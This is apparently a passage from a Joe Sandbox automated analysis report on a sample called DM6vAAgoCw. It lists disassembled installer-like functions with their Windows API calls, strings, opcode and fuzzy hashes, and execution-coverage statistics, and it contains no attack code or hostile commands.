                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                              • API String ID: 1697273262-1764544995
                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                              Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                              • API String ID: 2577523808-3778932970
                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                              Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcatwsprintf
                                                                                              • String ID: %02x%c$...
                                                                                              • API String ID: 3065427908-1057055748
                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                              Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                              • API String ID: 2266616436-4211696005
                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                              Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1599320355-0
                                                                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                              Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                              • String ID: Version
                                                                                              • API String ID: 512980652-315105994
                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                              Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                              Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                              • String ID:
                                                                                              • API String ID: 2883127279-0
                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                              Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                              Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                              • String ID: !N~
                                                                                              • API String ID: 623250636-529124213
                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                              Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                              Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3509786178-2769509956
                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                              Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:2.7%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:130
